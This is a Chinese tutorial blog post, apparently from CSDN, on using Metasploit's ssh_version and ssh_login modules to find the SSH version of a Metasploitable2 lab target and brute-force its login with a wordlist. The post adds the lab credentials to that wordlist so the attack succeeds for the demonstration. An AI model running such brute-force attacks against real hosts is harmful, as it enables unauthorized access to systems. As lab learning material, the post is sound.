Metasploit 内网渗透三 —— Metasploit 渗透测试之信息搜集4 ——基于SSH协议收集主机信息

目录

基于SSH协议收集信息 --Metasploitable2-linux


实验内网渗透环境

Metasploitable2-linux:靶机 192.168.234.8

kali-debian:攻击机 192.168.234.141

win7 虚拟机:靶机 192.168.234.158

在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!

基于SSH协议收集信息 --Metasploitable2-linux

  1. 利用auxiliary/scanner/ssh/ssh_version模块扫描ssh版本信息2.0
  2. 利用auxiliary/scanner/ssh/ssh_login模块暴力破解linux用户和密码信息
    1. 开启kali新窗口,手动加入linux用户和密码到字典 ---以便展示效果
    2. ssh_login模块中set创建字典文件对象(设置字典--暴力破解依赖于字典文件)
    3. run,发现成功登录linux,有攻击机的40193端口向靶机ssh协议的22端口是开放的 --进行暴力破解

        暴力破解                  ——不停发送数据和收到响应包,如果有有效的密码就可以进行登录

        SSH(Secure Shell)是安全、加密的远程连接网络协议,用于通过加密和身份验证实现安全的远程登录和文件传输,使用户能够安全远程访问和管理远程计算机。端口号:22

疑问:设置手动加入密码进字典的目的是?不设置会怎么样

(1)查看 ssh 服务的版本信息

msf6 > use auxiliary/scanner/ssh/ssh_version

msf6 auxiliary(scanner/ssh/ssh_version) > show options

msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.2324.8

msf6 auxiliary(scanner/ssh/ssh_version) > run

(2)对 SSH 暴力破解

msf6 > use auxiliary/scanner/ssh/ssh_login

msf6 auxiliary(scanner/ssh/ssh_login) > show options

msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.234.8

msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

                       ——设置字典文件默认的字典文件是不满足实际需求的==》我们需使用更强大的字典文件

root@zwzj:~# echo "msfadmin msfadmin" >> /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

                        ——因为字典文件中不包含我们的用户密码信息我们把自己的密码信息手动加入进去以便展示效果新开一个终端窗口

msf6 auxiliary(scanner/ssh/ssh_login) > run        —— 回到 MSF 终端执行

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值